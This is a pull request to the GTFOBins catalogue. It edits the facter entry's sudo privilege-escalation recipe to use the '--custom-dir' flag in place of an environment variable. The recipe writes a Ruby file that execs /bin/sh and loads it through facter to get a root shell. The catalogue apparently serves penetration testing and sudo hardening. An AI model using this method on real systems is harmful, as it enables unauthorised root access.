### PR TITLE
Edit sudo facter command. Env variable isn't needed

### DIFF
--- a/_gtfobins/facter.md
+++ b/_gtfobins/facter.md
@@ -9,5 +9,5 @@ functions:
     - code: |
         TF=$(mktemp -d)
         echo 'exec("/bin/sh")' > $TF/x.rb
-        sudo FACTERLIB=$TF facter
+        sudo facter --custom-dir=$TF x
 ---


### PR DESCRIPTION
Hi

Setting environment variable in sudo requires permissions for preserve the environment also (env_check, or env_keep options). So without this permissions escalation via variable fails. However, environment variable isn't needed for facter binary escalation. We can use --custom-dir flag instead

Tested on CentOS 7 and Oracle Linux 9.